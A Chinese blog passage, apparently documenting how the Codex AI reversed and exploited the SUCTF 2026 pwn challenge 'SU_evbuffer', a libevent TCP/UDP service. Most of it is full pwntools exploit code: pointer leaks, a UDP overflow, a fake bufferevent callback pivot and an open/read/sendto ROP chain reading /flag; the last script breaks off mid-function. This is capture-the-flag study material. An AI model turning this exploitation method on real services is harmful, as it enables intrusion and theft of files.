llm for security 1: suctf 2026: SU_evbuffer

2026-04-15

1. 前言

LLM给各行各业都带来了提升,CTF也不例外。但是,LLM对CTF乃至整个安全领域的提升边界究竟在哪里?LLM是否会直接淘汰安全研究人员?新时代的安全研究员应如何利用LLM提高自身能力,同时保证自己的不可替代性?要想回答这些问题,还是需要亲自实践一下,分析LLM现在的安全能力到底如何。

2. LLM选型: Codex

没有其他原因,只是因为codex允许我用,antigravity和claude都把我否了。

2.1 codex配置ida mcp

https://github.com/mrexodia/ida-pro-mcp
也可以参考IDAPro–MCP详细配置教程
保护全开。

3. SUCTF 2026:evbuffer

以一道题目为例,探索一下codex对于pwn题的能力分析:

3.1 安全保护机制

3.2 在已有题目环境基础下,给出docker pwn调试教程

https://pwndbg.re/stable/setup/#portable-release
下给出了一键式安装的步骤,仅需要在dockerfile中添加如下内容:

RUN apt-get install -y lib32z1 libevent-2.1-7 libseccomp2 git gdb curl xz-utils
RUN curl --proto '=https' --tlsv1.2 -LsSf 'https://install.pwndbg.re' | sh -s -- -t pwndbg-gdb

启动容器时,记得添加ptrace权限:

docker run --cap-add=SYS_PTRACE -d -p "0.0.0.0:8888:8888" -p "0.0.0.0:8889:8889/udp" -h "pwn" --name="pwn" --restart always suctf_evbuffer:pwn1

docker exec -u 0 -it pwn bash

3.3 codex分析

我给codex下了如下命令:

使用ida的mcp功能,分析该二进制文件,梳理程序执行逻辑,找到漏洞,并写出exp脚本

codex返回的结果如下:

首先,codex只执行了前半部分,分析二进制文件梳理逻辑并找到漏洞,并没有给出exp脚本
另外没有人工先验知识的情况下,要分析AI说的是对是错太困难了,我给它下了另一个指令:

根据你的结论,对一些sub_xxx函数重新命名

把.bss段的全局对象也重命名,并添加注释

分析完后,可以得到codex分析的先验知识:
这是一个接收tcp/udp报文并进行处理的程序,使用的是libevent库。

3.3.1 POC

我希望ai能够做出这道题目,于是给他下了其他命令:

现在这个环境可以访问,ip地址为127.0.0.1:8888和127.0.0.1:8889,请写出你的poc

实测POC是能触发程序崩溃的。

3.3.2 更进一步:exp

地址泄露是正常的,但是代码其实写得并不友好,不方便定位错误:

#!/usr/bin/env python3
from pwn import *


# Load the challenge binary and the libc it ships with (both expected in the
# current working directory).
context.binary = ELF("./pwn", checksec=False)
elf = context.binary
libc = ELF("./libc.so.6", checksec=False)

context.arch = elf.arch
context.os = elf.os
# NOTE: there is deliberately no `context.log_level = args.LOG_LEVEL or "info"`
# here. pwntools consumes the LOG_LEVEL=... magic argument itself and applies
# it to the context instead of exposing it through `args`, so that assignment
# always evaluated to "info" and overrode the user's choice. "info" is
# already the default level.

# Target endpoint and tunables. Each one can be overridden on the command
# line as KEY=value, e.g. `HOST=10.0.0.5 TCP_PORT=9999`.
HOST = args.HOST or "127.0.0.1"
PORT_TCP = int(args.TCP_PORT or 8888)
PORT_UDP = int(args.UDP_PORT or 8889)
FILE_PATH = (args.PATH or "/flag").encode() + b"\x00"
READ_FD = int(args.READ_FD or 9)
UDP_FD = int(args.UDP_FD or 6)

# Leak/layout offsets recovered from the target binary and verified in gdb.
LIBEVENT_LEAK_OFF = 0x137D8
GLOBAL_EVENT_BASE_DELTA = 0x8B0
STACK_BUF_DELTA = 0x3D0
PIE_LEAK_RET_OFF = 0x1619
CALL_SENDTO_OFF = 0x154A

# The challenge environment appears to keep libc at a fixed offset from libevent.
# The provided VM/docker layout uses 0x249000; some other local setups use 0x367000.
LIBC_FROM_LIBEVENT = int(args.LIBC_DELTA or 0x249000)


def start_tcp():
    """Open and return a pwntools TCP tube to ``HOST:PORT_TCP``."""
    tcp_tube = remote(HOST, PORT_TCP, typ="tcp")
    return tcp_tube


def start_udp():
    """Open and return a pwntools UDP tube to ``HOST:PORT_UDP``."""
    udp_tube = remote(HOST, PORT_UDP, typ="udp")
    return udp_tube


def choose_heap_candidate(leak: bytes) -> int:
    """Pick the heap pointer out of a leaked reply.

    Two 8-byte slots (offsets 0x28 and 0x30) are decoded. The largest value
    inside ``[0x100000000000, 0x800000000000)`` is returned; if neither slot
    falls in that window, the second slot is returned and a warning is logged.
    """
    slots = [u64(leak[off:off + 8]) for off in (0x28, 0x30)]
    plausible = [ptr for ptr in slots if 0x100000000000 <= ptr < 0x800000000000]

    if not plausible:
        fallback = slots[-1]
        log.warning("heap leak looked odd, falling back to %#x", fallback)
        return fallback

    best = max(plausible)
    log.info("heap candidates = %s, chosen = %#x", [hex(ptr) for ptr in slots], best)
    return best


def leak_state():
    """Send one benign request over TCP and one over UDP and decode the leaks.

    Returns a dict holding the request blob (``ip``), both open tubes
    (``io_tcp``, ``io_udp``) and the derived addresses ``libc_base``,
    ``pie_base``, ``stack_buf`` and ``global_event_base``.
    """
    probe = b"0.0.0.0\x00"

    # TCP reply: a libevent pointer at +0x18 and a heap pointer candidate.
    tcp_tube = start_tcp()
    tcp_tube.send(probe)
    tcp_reply = tcp_tube.recvn(0x50)

    libevent_ptr = u64(tcp_reply[0x18:0x20])
    heap_ptr = choose_heap_candidate(tcp_reply)
    libevent_at = libevent_ptr - LIBEVENT_LEAK_OFF
    libc_at = libevent_at - LIBC_FROM_LIBEVENT
    event_base_at = heap_ptr - GLOBAL_EVENT_BASE_DELTA

    log.info("leaked_libevent = %#x", libevent_ptr)
    log.info("libevent_base    = %#x", libevent_at)
    log.info("libc_base        = %#x", libc_at)
    log.info("global_event_base= %#x", event_base_at)

    # UDP reply: a stack pointer at +0x40 and a PIE return address at +0x48.
    udp_tube = start_udp()
    udp_tube.send(probe)
    udp_reply = udp_tube.recvn(0x50)

    stack_ptr = u64(udp_reply[0x40:0x48])
    pie_ret = u64(udp_reply[0x48:0x50])
    pie_at = pie_ret - PIE_LEAK_RET_OFF
    buf_at = stack_ptr - STACK_BUF_DELTA

    log.info("leaked_stack     = %#x", stack_ptr)
    log.info("stack_buf        = %#x", buf_at)
    log.info("pie_base         = %#x", pie_at)

    return dict(
        ip=probe,
        io_tcp=tcp_tube,
        io_udp=udp_tube,
        libc_base=libc_at,
        pie_base=pie_at,
        stack_buf=buf_at,
        global_event_base=event_base_at,
    )


def build_rop(libc_base: int, pie_base: int, stack_buf: int) -> tuple:
    """Build the open/read/sendto ROP chain and locate the pivot gadget.

    Args:
        libc_base: runtime base of libc; added to every libc gadget/symbol offset.
        pie_base: runtime base of the main binary; used for the sendto call site.
        stack_buf: base address the payload is expected to occupy (derived
            from the leaked stack pointer by the caller).

    Returns:
        A 3-tuple ``(chain, fake_bev_addr, mov_rsp_rdx)``: the packed chain as
        bytes, the address reserved for the fake bufferevent
        (``stack_buf + 0x80``) and the absolute address of the
        ``mov rsp, rdx ; ret`` byte sequence found in libc.
    """
    rop = ROP(libc)
    pop_rdi = libc_base + rop.find_gadget(["pop rdi", "ret"]).address
    pop_rsi = libc_base + rop.find_gadget(["pop rsi", "ret"]).address
    pop_rax = libc_base + rop.find_gadget(["pop rax", "ret"]).address
    pop_rdx_rbp_r12 = libc_base + rop.find_gadget(["pop rdx", "pop rbp", "pop r12", "ret"]).address

    open_addr = libc_base + libc.sym["open"]
    read_addr = libc_base + libc.sym["read"]
    # 48 89 d4 c3 == mov rsp, rdx ; ret
    mov_rsp_rdx = libc_base + next(libc.search(b"\x48\x89\xd4\xc3"))
    call_sendto = pie_base + CALL_SENDTO_OFF

    fake_bev_addr = stack_buf + 0x80

    chain = flat(
        # open(path, 0)
        pop_rdi,
        stack_buf + 0x10,   # "/flag"
        pop_rsi,
        0,
        open_addr,
        # read(READ_FD, stack_buf + 0x18, 0x100)
        pop_rdi,
        READ_FD,            # open() return value in the provided env
        pop_rsi,
        stack_buf + 0x18,
        pop_rdx_rbp_r12,
        0x100,
        0,
        0,
        read_addr,
        # Load registers, then jump to the binary's own sendto call site.
        pop_rdx_rbp_r12,
        stack_buf - 0x10,   # saved UDP sockaddr on udp_read_cb stack
        0,
        0,
        pop_rax,
        UDP_FD,             # UDP socket fd in the provided env
        pop_rsi,
        stack_buf + 0x18,
        call_sendto,
    )

    return chain, fake_bev_addr, mov_rsp_rdx


def build_fake_bufferevent(fake_bev_addr: int, mov_rsp_rdx: int) -> bytes:
    """Serialize the fake bufferevent/evbuffer object placed at *fake_bev_addr*.

    The blob is 0x120 bytes long: six header words, zero padding up to 0x78,
    the callback list head plus one inline callback entry, zero padding up to
    0x118, and finally a pointer back to *fake_bev_addr*.
    """
    entry_addr = fake_bev_addr + 0x80
    chain_addr = fake_bev_addr + 0x120
    pivot_value = chain_addr - 0x50

    header_words = [
        0,              # evbuffer.first
        0,              # evbuffer.last
        fake_bev_addr,  # evbuffer.last_with_datap -> self
        pivot_value,    # gets carried into rdx before cb call
        pivot_value,    # scratch field used on the same path
        fake_bev_addr,  # scratch/self
    ]
    # evbuffer.callbacks LIST_HEAD + inline fake evbuffer_cb_entry.
    callback_words = [
        entry_addr,     # callbacks.lh_first
        0,              # entry.next.le_next
        0,              # entry.next.le_prev
        mov_rsp_rdx,    # entry.cb.cb_func
        0,              # entry.cbarg
        0x40001,        # entry.flags
        0,
    ]

    blob = flat(*header_words).ljust(0x78, b"\x00")
    blob = (blob + flat(*callback_words)).ljust(0x118, b"\x00")
    return blob + p64(fake_bev_addr)  # fake bufferevent.output


def build_payload(ip: bytes, stack_buf: int, global_event_base: int, fake_bev_addr: int, fake_bev: bytes, rop_chain: bytes) -> bytes:
    """Assemble the UDP datagram that carries the overflow.

    Layout (offsets from the start of the datagram):
        0x00  request string *ip*, NUL-padded to 0x10
        0x10  FILE_PATH
        0x58  four 8-byte words: 1, fake_bev_addr, 0, global_event_base
        0x80  *fake_bev* followed by *rop_chain*

    Args:
        ip: NUL-terminated IPv4 string used as the request prefix.
        stack_buf: unused here; kept so existing callers keep working.
        global_event_base: value written into the fourth overwritten word.
        fake_bev_addr: address written into the second overwritten word.
        fake_bev: serialized fake bufferevent blob.
        rop_chain: packed ROP chain appended after *fake_bev*.

    Raises:
        ValueError: if *ip* plus FILE_PATH do not fit before offset 0x58.
            ``ljust`` would otherwise do nothing and every later field would
            silently land at the wrong offset.
    """
    prefix = ip.ljust(0x10, b"\x00") + FILE_PATH
    if len(prefix) > 0x58:
        raise ValueError(
            "request + FILE_PATH is %#x bytes, must fit in 0x58" % len(prefix)
        )
    payload = prefix.ljust(0x58, b"\x00")

    # Overwrite tcp_io_ctx_{use_bev, bev, fd} and global_event_base.
    payload += flat(
        1,
        fake_bev_addr,
        0,
        global_event_base,
    )
    payload = payload.ljust(0x80, b"\x00")
    payload += fake_bev
    payload += rop_chain
    return payload


def exploit():
    """Leak addresses, build the payload, fire it and show whatever comes back."""
    leaks = leak_state()
    tcp_tube = leaks["io_tcp"]
    udp_tube = leaks["io_udp"]

    chain, bev_addr, pivot_gadget = build_rop(
        leaks["libc_base"], leaks["pie_base"], leaks["stack_buf"]
    )
    bev_blob = build_fake_bufferevent(bev_addr, pivot_gadget)
    datagram = build_payload(
        leaks["ip"],
        leaks["stack_buf"],
        leaks["global_event_base"],
        bev_addr,
        bev_blob,
        chain,
    )

    log.info("fake_bev_addr    = %#x", bev_addr)
    log.info("mov_rsp_rdx      = %#x", pivot_gadget)
    log.info("payload_len      = %#x", len(datagram))
    log.info("FILE_PATH        = %r", FILE_PATH)
    log.info("READ_FD / UDP_FD = %d / %d", READ_FD, UDP_FD)

    # PAUSE=1 on the command line gives time to attach a debugger.
    if args.PAUSE:
        pause()

    # UDP datagram first, then a plain TCP request.
    udp_tube.send(datagram)
    tcp_tube.send(leaks["ip"])

    reply = udp_tube.recv(timeout=2)
    if not reply:
        log.warning("no immediate UDP response; switching to interactive mode")
    else:
        log.success("received %d bytes back over UDP", len(reply))
        print(reply)

    udp_tube.interactive()


if __name__ == "__main__":
    exploit()

重新发送指令:

请更改代码,添加注释,使其更易阅读和理解。

#!/usr/bin/env python3
from pwn import *


# This exploit uses the bug in handle_ip_request():
#   1. trigger normal TCP/UDP replies to leak runtime addresses;
#   2. place a fake bufferevent/evbuffer on the UDP callback stack;
#   3. overwrite tcp_io_ctx so the next TCP request uses our fake object;
#   4. pivot into a ROP chain that performs open/read/sendto.

# Load the challenge binary and the libc it ships with (both expected in the
# current working directory).
context.binary = ELF("./pwn", checksec=False)
elf = context.binary
libc = ELF("./libc.so.6", checksec=False)

context.arch = elf.arch
context.os = elf.os
# NOTE: there is deliberately no `context.log_level = args.LOG_LEVEL or "info"`
# here. pwntools consumes the LOG_LEVEL=... magic argument itself and applies
# it to the context instead of exposing it through `args`, so that assignment
# always evaluated to "info" and overrode the user's choice. "info" is
# already the default level.

# Target endpoint and tunables, overridable on the command line as KEY=value.
HOST = args.HOST or "192.168.62.130"
PORT_TCP = int(args.TCP_PORT or 8888)
PORT_UDP = int(args.UDP_PORT or 8889)
FILE_PATH = (args.PATH or "/flag").encode() + b"\x00"
READ_FD = int(args.READ_FD or 9)
UDP_FD = int(args.UDP_FD or 6)

# Layout/constants recovered from reversing the main binary and confirmed in gdb.
LIBEVENT_LEAK_OFF = 0x137D8
GLOBAL_EVENT_BASE_DELTA = 0x8B0
STACK_BUF_DELTA = 0x3D0
PIE_LEAK_RET_OFF = 0x1619
CALL_SENDTO_OFF = 0x154A

# The challenge environment appears to keep libc at a fixed offset from libevent.
# The provided VM/docker layout uses 0x249000; some other local setups use 0x367000.
LIBC_FROM_LIBEVENT = int(args.LIBC_DELTA or 0x249000)

# Offsets inside the UDP overflow region. The UDP path writes into udp_io_ctx at 0x4040
# and overflows forward into tcp_io_ctx at 0x4078.
OVERFLOW_TO_TCP_CTX = 0x38
OVERFLOW_TO_TCP_USE_BEV = OVERFLOW_TO_TCP_CTX + 0x20

# Offsets inside struct bufferevent / evbuffer used by the fake object.
FAKE_BEV_OUTPUT_OFF = 0x118
FAKE_EVB_CALLBACKS_OFF = 0x78


def build_ip_request_blob() -> bytes:
    """Return the request prefix every trigger packet starts with.

    The service first runs inet_pton() on the input, so the packet must begin
    with a valid IPv4 string followed by a NUL terminator.
    """
    ipv4_text = b"0.0.0.0\x00"
    return ipv4_text


def start_tcp():
    """Open and return a pwntools TCP tube to ``HOST:PORT_TCP``."""
    tcp_tube = remote(HOST, PORT_TCP, typ="tcp")
    return tcp_tube


def start_udp():
    """Open and return a pwntools UDP tube to ``HOST:PORT_UDP``."""
    udp_tube = remote(HOST, PORT_UDP, typ="udp")
    return udp_tube


def choose_heap_candidate(leak: bytes) -> int:
    """Pick the heap pointer out of the 0x50-byte hostname reply.

    Different environments may place a useful heap pointer at slightly
    different offsets, so both known slots (0x28 and 0x30) are decoded. The
    largest value inside ``[0x100000000000, 0x800000000000)`` wins; when
    neither slot qualifies, the second slot is returned and a warning logged.
    """
    slots = [u64(leak[off:off + 8]) for off in (0x28, 0x30)]
    plausible = [ptr for ptr in slots if 0x100000000000 <= ptr < 0x800000000000]

    if not plausible:
        fallback = slots[-1]
        log.warning("heap leak looked odd, falling back to %#x", fallback)
        return fallback

    best = max(plausible)
    log.info("heap candidates = %s, chosen = %#x", [hex(ptr) for ptr in slots], best)
    return best


def leak_state():
    """Send one benign request over TCP and one over UDP and decode the leaks.

    Returns a dict holding the request blob (``ip``), both open tubes
    (``io_tcp``, ``io_udp``) and the derived addresses ``libc_base``,
    ``pie_base``, ``stack_buf`` and ``global_event_base``.
    """
    probe = build_ip_request_blob()

    # Stage 1a: the legitimate TCP response leaks libevent/heap pointers.
    tcp_tube = start_tcp()
    tcp_tube.send(probe)
    tcp_reply = tcp_tube.recvn(0x50)

    libevent_ptr = u64(tcp_reply[0x18:0x20])
    heap_ptr = choose_heap_candidate(tcp_reply)
    libevent_at = libevent_ptr - LIBEVENT_LEAK_OFF
    libc_at = libevent_at - LIBC_FROM_LIBEVENT
    event_base_at = heap_ptr - GLOBAL_EVENT_BASE_DELTA

    log.info("leaked_libevent = %#x", libevent_ptr)
    log.info("libevent_base    = %#x", libevent_at)
    log.info("libc_base        = %#x", libc_at)
    log.info("global_event_base= %#x", event_base_at)

    # Stage 1b: the legitimate UDP response leaks a stack pointer and a PIE
    # return address from udp_read_cb().
    udp_tube = start_udp()
    udp_tube.send(probe)
    udp_reply = udp_tube.recvn(0x50)

    stack_ptr = u64(udp_reply[0x40:0x48])
    pie_ret = u64(udp_reply[0x48:0x50])
    pie_at = pie_ret - PIE_LEAK_RET_OFF
    buf_at = stack_ptr - STACK_BUF_DELTA

    log.info("leaked_stack     = %#x", stack_ptr)
    log.info("stack_buf        = %#x", buf_at)
    log.info("pie_base         = %#x", pie_at)

    return dict(
        ip=probe,
        io_tcp=tcp_tube,
        io_udp=udp_tube,
        libc_base=libc_at,
        pie_base=pie_at,
        stack_buf=buf_at,
        global_event_base=event_base_at,
    )


def build_rop(libc_base: int, pie_base: int, stack_buf: int) -> tuple:
    """Build the open/read/sendto ROP chain and locate the pivot gadget.

    The final ROP chain lives on the UDP callback stack, right after the fake
    bufferevent object. A fake evbuffer callback pivots rsp into this chain.

    Args:
        libc_base: runtime base of libc; added to every libc gadget/symbol offset.
        pie_base: runtime base of the main binary; used for the sendto call site.
        stack_buf: base address of the overflown UDP stack buffer.

    Returns:
        A 3-tuple ``(chain, fake_bev_addr, mov_rsp_rdx)``: the packed chain as
        bytes, the address reserved for the fake bufferevent
        (``stack_buf + 0x80``) and the absolute address of the
        ``mov rsp, rdx ; ret`` byte sequence found in libc.
    """
    rop = ROP(libc)
    pop_rdi = libc_base + rop.find_gadget(["pop rdi", "ret"]).address
    pop_rsi = libc_base + rop.find_gadget(["pop rsi", "ret"]).address
    pop_rax = libc_base + rop.find_gadget(["pop rax", "ret"]).address
    pop_rdx_rbp_r12 = libc_base + rop.find_gadget(["pop rdx", "pop rbp", "pop r12", "ret"]).address

    open_addr = libc_base + libc.sym["open"]
    read_addr = libc_base + libc.sym["read"]
    # 48 89 d4 c3 == mov rsp, rdx ; ret
    mov_rsp_rdx = libc_base + next(libc.search(b"\x48\x89\xd4\xc3"))
    call_sendto = pie_base + CALL_SENDTO_OFF

    # The fake object is placed inside the overflown UDP stack buffer.
    fake_bev_addr = stack_buf + 0x80

    chain = flat(
        # open(path, 0)
        pop_rdi,
        stack_buf + 0x10,   # FILE_PATH copied into the start of the UDP buffer
        pop_rsi,
        0,
        open_addr,
        # read(READ_FD, stack_buf + 0x18, 0x100)
        pop_rdi,
        READ_FD,            # expected fd returned by open() in this environment
        pop_rsi,
        stack_buf + 0x18,
        pop_rdx_rbp_r12,
        0x100,
        0,
        0,
        read_addr,
        # Load registers, then jump to the binary's own sendto call site.
        pop_rdx_rbp_r12,
        stack_buf - 0x10,   # sockaddr saved by recvfrom() in udp_read_cb()
        0,
        0,
        pop_rax,
        UDP_FD,             # UDP socket fd in the provided env
        pop_rsi,
        stack_buf + 0x18,
        call_sendto,
    )

    return chain, fake_bev_addr, mov_rsp_rdx


def build_fake_bufferevent(fake_bev_addr: int, mov_rsp_rdx: int) -> bytes:
    """Serialize the fake bufferevent/evbuffer object placed at *fake_bev_addr*.

    fake_bev doubles as a fake evbuffer because bufferevent_get_output()
    returns bev->output, and handle_ip_request() immediately passes that
    pointer into evbuffer_add_reference().

    Args:
        fake_bev_addr: runtime address the blob will occupy.
        mov_rsp_rdx: absolute address of a ``mov rsp, rdx ; ret`` gadget,
            installed as the callback function.

    Returns:
        A blob of ``FAKE_BEV_OUTPUT_OFF + 8`` bytes.
    """
    # callbacks.lh_first must point at the inline entry that follows the
    # 8-byte list head, not at the list head itself. Pointing it at
    # FAKE_EVB_CALLBACKS_OFF would make the entry's fields read 8 bytes early.
    fake_callbacks_addr = fake_bev_addr + FAKE_EVB_CALLBACKS_OFF + 8
    rop_addr = fake_bev_addr + FAKE_BEV_OUTPUT_OFF + 8

    fake = flat(
        0,                      # evbuffer.first
        0,                      # evbuffer.last
        fake_bev_addr,          # evbuffer.last_with_datap -> self
        rop_addr - 0x50,        # later propagated into rdx before the callback
        rop_addr - 0x50,        # scratch field touched on the same path
        fake_bev_addr,          # scratch/self
    )
    fake = fake.ljust(FAKE_EVB_CALLBACKS_OFF, b"\x00")

    # Fake evbuffer.callbacks LIST_HEAD + one inline evbuffer_cb_entry.
    # The callback body is a tiny gadget: mov rsp, rdx ; ret.
    fake += flat(
        fake_callbacks_addr,    # callbacks.lh_first -> entry just below
        0,                      # entry.next.le_next
        0,                      # entry.next.le_prev
        mov_rsp_rdx,            # entry.cb.cb_func
        0,                      # entry.cbarg
        0x40001,                # entry.flags
        0,
    )
    fake = fake.ljust(FAKE_BEV_OUTPUT_OFF, b"\x00")
    fake += p64(fake_bev_addr)  # fake bufferevent.output -> fake evbuffer
    return fake


def build_payload(
    ip: bytes,
    stack_buf: int,
    global_event_base: int,
    fake_bev_addr: int,
    fake_bev: bytes,
    rop_chain: bytes,
) -> bytes:
    """Assemble the UDP datagram that carries the overflow.

    The payload is copied by the UDP path into udp_io_ctx and then continues
    overflowing forward into tcp_io_ctx. The same bytes also remain on the UDP
    stack, which is why we can later pivot into the fake object/ROP chain.

    Args:
        ip: NUL-terminated IPv4 string used as the request prefix.
        stack_buf: unused here; kept so existing callers keep working.
        global_event_base: original value, written back unchanged.
        fake_bev_addr: address of the fake bufferevent.
        fake_bev: serialized fake bufferevent blob.
        rop_chain: packed ROP chain appended after *fake_bev*.

    Raises:
        ValueError: if *ip* plus FILE_PATH do not fit before
            OVERFLOW_TO_TCP_USE_BEV. ``ljust`` would otherwise do nothing and
            every later field would silently land at the wrong offset.
    """
    prefix = ip.ljust(0x10, b"\x00") + FILE_PATH
    if len(prefix) > OVERFLOW_TO_TCP_USE_BEV:
        raise ValueError(
            "request + FILE_PATH is %#x bytes, must fit in %#x"
            % (len(prefix), OVERFLOW_TO_TCP_USE_BEV)
        )
    payload = prefix.ljust(OVERFLOW_TO_TCP_USE_BEV, b"\x00")

    # Overwrite:
    #   tcp_io_ctx_use_bev -> 1, so the next TCP request goes through bev->output;
    #   tcp_io_ctx_bev     -> fake_bev on the UDP stack;
    #   tcp_io_ctx_fd      -> unused here;
    #   global_event_base  -> preserved to avoid destabilizing libevent.
    payload += flat(
        1,
        fake_bev_addr,
        0,
        global_event_base,
    )
    # The fake object is expected at offset 0x80 of the buffer.
    payload = payload.ljust(0x80, b"\x00")
    payload += fake_bev
    payload += rop_chain
    return payload


def exploit():
    """Run the three stages: leak, build, trigger; then show the response."""
    # Stage 1: gather the addresses needed to place the fake object and ROP chain.
    leaks = leak_state()
    tcp_tube = leaks["io_tcp"]
    udp_tube = leaks["io_udp"]

    # Stage 2: build the fake libevent object and the ORW/sendto ROP chain.
    chain, bev_addr, pivot_gadget = build_rop(
        leaks["libc_base"], leaks["pie_base"], leaks["stack_buf"]
    )
    bev_blob = build_fake_bufferevent(bev_addr, pivot_gadget)
    datagram = build_payload(
        leaks["ip"],
        leaks["stack_buf"],
        leaks["global_event_base"],
        bev_addr,
        bev_blob,
        chain,
    )

    log.info("fake_bev_addr    = %#x", bev_addr)
    log.info("mov_rsp_rdx      = %#x", pivot_gadget)
    log.info("payload_len      = %#x", len(datagram))
    log.info("FILE_PATH        = %r", FILE_PATH)
    log.info("READ_FD / UDP_FD = %d / %d", READ_FD, UDP_FD)

    # PAUSE=1 on the command line gives time to attach a debugger.
    if args.PAUSE:
        pause()

    # Stage 3: send the UDP overflow first, then a short TCP request to consume
    # tcp_io_ctx_bev and drive execution into bufferevent_get_output(fake_bev).
    udp_tube.send(datagram)
    tcp_tube.send(leaks["ip"])

    reply = udp_tube.recv(timeout=2)
    if not reply:
        log.warning("no immediate UDP response; switching to interactive mode")
    else:
        log.success("received %d bytes back over UDP", len(reply))
        print(reply)

    udp_tube.interactive()


if __name__ == "__main__":
    exploit()

写出的代码易读了很多,方便我们做修改
现在开始debug吧,原本是想自己先写一版人工脚本,但是转念一想,以后肯定是ai+人来打比赛和学习了,在ai的基础上修改是必要技能,遂放弃人工的想法。
利用后发现程序没有回显,这倒是正常,重点在于如何调试发现问题,并解决。

3.3.3 exp调试

调试时需要先让codex给出完整的利用思路,并按照该思路编排代码,这样更方便调试(否则一时间很难看出问题发生在哪里):
首先是重新生成一份代码,payload是按利用顺序来构造的
修改后的payload构造如下:
后续调试只需要改payload发就行:

#!/usr/bin/env python3
import socket

from pwn import *


# Load the challenge binary and the libc it ships with (both expected in the
# current working directory).
context.binary = ELF("./pwn", checksec=False)
libc = ELF("./libc.so.6", checksec=False)
context.arch = "amd64"
context.os = "linux"
# NOTE: there is deliberately no `context.log_level = args.LOG_LEVEL or "info"`
# here. pwntools consumes the LOG_LEVEL=... magic argument itself and applies
# it to the context instead of exposing it through `args`, so that assignment
# always evaluated to "info" and overrode the user's choice. "info" is
# already the default level.

# Target endpoint and tunables, overridable on the command line as KEY=value.
HOST = args.HOST or "192.168.62.130"
TCP_PORT = int(args.TCP_PORT or 8888)
UDP_PORT = int(args.UDP_PORT or 8889)
FILE_PATH = (args.PATH or "/flag").encode() + b"\x00"
READ_FD = int(args.READ_FD or 9)
UDP_FD = int(args.UDP_FD or 6)

# Offsets confirmed during reversing / debugging.
LIBEVENT_LEAK_OFF = 0x137D8
GLOBAL_EVENT_BASE_DELTA = 0x8B0
PIE_LEAK_RET_OFF = 0x1619
LIBC_FROM_LIBEVENT = int(args.LIBC_DELTA or 0x249000)
CALL_SENDTO_OFF = 0x154A

# Offsets relative to the PIE base of the main binary.
UDP_IO_CTX_OFF = 0x4040
# Distance from udp_io_ctx to the first overwritten tcp_io_ctx field.
OVERFLOW_TO_TCP_USE_BEV = 0x58
BSS_FAKE_BEV_OFF = 0x40C0
BSS_PATH_OFF = 0x41F0
BSS_READ_BUF_OFF = 0x4200
BSS_SOCKADDR_OFF = 0x4300
BSS_ROP_OFF = 0x4320
# Field offsets inside the fake evbuffer / bufferevent.
FAKE_EVB_CALLBACKS_OFF = 0x78
FAKE_BEV_OUTPUT_OFF = 0x118


def request_blob() -> bytes:
    """Return the NUL-terminated IPv4 string used as the request prefix."""
    ipv4_text = b"0.0.0.0\x00"
    return ipv4_text


def choose_heap_candidate(reply: bytes) -> int:
    """Pick the heap pointer out of a leaked reply.

    Decodes the 8-byte slots at offsets 0x28 and 0x30 and returns the largest
    one inside ``[0x100000000000, 0x800000000000)``; if neither qualifies,
    the second slot is returned as-is.
    """
    slots = [u64(reply[off:off + 8]) for off in (0x28, 0x30)]
    plausible = [ptr for ptr in slots if 0x100000000000 <= ptr < 0x800000000000]
    if plausible:
        return max(plausible)
    return slots[-1]


def open_channels():
    """Open the TCP tube, then the UDP tube, and return them as ``(tcp, udp)``."""
    tcp_tube = remote(HOST, TCP_PORT, typ="tcp")
    udp_tube = remote(HOST, UDP_PORT, typ="udp")
    return (tcp_tube, udp_tube)


def leak_all(tcp, udp):
    """Send one benign request on each tube and decode every leaked value.

    Returns a dict (insertion-ordered) with the raw replies, the raw leaked
    pointers, the derived base addresses, and ``udp_peer``, the local
    ``(host, port)`` of the UDP socket as reported by ``getsockname()``.
    """
    probe = request_blob()

    # TCP reply: libevent pointer at +0x18 plus a heap pointer candidate.
    tcp.send(probe)
    tcp_reply = tcp.recvn(0x50)
    libevent_ptr = u64(tcp_reply[0x18:0x20])
    heap_ptr = choose_heap_candidate(tcp_reply)
    libevent_at = libevent_ptr - LIBEVENT_LEAK_OFF

    leaks = {
        "tcp_reply": tcp_reply,
        "leaked_libevent": libevent_ptr,
        "libevent_base": libevent_at,
        "libc_base": libevent_at - LIBC_FROM_LIBEVENT,
        "leaked_heap": heap_ptr,
        "global_event_base": heap_ptr - GLOBAL_EVENT_BASE_DELTA,
    }

    # UDP reply: stack pointer at +0x40, PIE return address at +0x48.
    udp.send(probe)
    udp_reply = udp.recvn(0x50)
    stack_ptr = u64(udp_reply[0x40:0x48])
    pie_ret = u64(udp_reply[0x48:0x50])

    leaks["udp_reply"] = udp_reply
    leaks["leaked_stack"] = stack_ptr
    leaks["leaked_pie_ret"] = pie_ret
    leaks["pie_base"] = pie_ret - PIE_LEAK_RET_OFF
    leaks["udp_peer"] = udp.sock.getsockname()

    return leaks


def _shortest_pop_gadget(rop, reg):
    """Return the shortest ``pop <reg>; [pop ...;] ret`` gadget known to *rop*.

    Raises:
        IndexError: if no such gadget exists (same exception type as the
            former ``sorted(...)[0]``, now with a readable message).
    """
    matches = [
        g
        for g in rop.gadgets.values()
        if g.insns
        and g.insns[-1] == "ret"
        and g.insns[0] == f"pop {reg}"
        and all(insn.startswith("pop ") for insn in g.insns[:-1])
    ]
    if not matches:
        raise IndexError(f"no 'pop {reg}; ...; ret' gadget found")
    # min() keeps the first of several equally short gadgets, like a stable sort.
    return min(matches, key=lambda g: len(g.insns))


def build_payload(leaks):
    """Build the UDP datagram for the control-flow-hijack debugging stage.

    The datagram is laid out relative to udp_io_ctx (PIE + UDP_IO_CTX_OFF):
    the request string, the overwritten tcp_io_ctx fields, a filler
    "bufferevent" whose ``output`` slot points at a fake evbuffer placed
    directly behind it, and a marker value at the pivot address.

    Args:
        leaks: dict produced by ``leak_all()``; reads ``pie_base``,
            ``libc_base``, ``global_event_base`` and ``udp_peer``.

    Returns:
        The datagram as bytes.
    """
    pie_base = leaks["pie_base"]
    libc_base = leaks["libc_base"]
    udp_ctx_addr = pie_base + UDP_IO_CTX_OFF

    fake_bev_addr = pie_base + BSS_FAKE_BEV_OFF
    path_addr = pie_base + BSS_PATH_OFF
    read_buf_addr = pie_base + BSS_READ_BUF_OFF
    sockaddr_addr = pie_base + BSS_SOCKADDR_OFF

    rop = ROP(libc)
    gadgets = {
        reg: _shortest_pop_gadget(rop, reg) for reg in ("rdi", "rsi", "rax", "rdx")
    }

    def pop(reg, value):
        # Gadget address, the wanted value, then one dummy word per extra pop.
        gadget = gadgets[reg]
        extra_pops = len(gadget.insns) - 2
        return p64(libc_base + gadget.address) + p64(value) + p64(0) * extra_pops

